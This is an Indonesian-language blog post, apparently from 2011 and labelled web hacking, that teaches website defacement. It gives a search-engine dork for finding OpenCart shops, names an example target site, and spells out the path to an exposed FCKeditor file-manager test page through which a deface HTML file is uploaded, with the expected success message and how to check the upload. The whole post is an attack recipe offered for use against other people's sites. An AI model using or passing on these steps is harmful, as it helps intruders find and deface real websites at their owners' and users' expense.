0
comments
|
3/8/11
dork : Powered By OpenCart site:com
"site:" terserah, yang penting support opencart
ex target: http://iphoneclone.biz/
nah kalo dh dpt trget, lngsung aj kita inject exploitnya
exploit :
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jadi nya gini ::
ex: http://iphoneclone.biz/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
liat yg kluar, dstu trdpat tmpat upload file nya.....
connector pilih PHP
lngsung aja kita upload file html deface kita...
jika berhasil mka akan kluar alert sprti ini
"file uploaded with no errors"
liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"
jejengggggg....!!!!!!
ex hasil: http://iphoneclone.biz/c u p u.html
sayangnya file yang kita upload nggk bisa nimpa file sblm nya, tetapi duplikat file...file(1).html or file(2).html..
Labels: web hacking
0 Comments:
Post a Comment
<< Home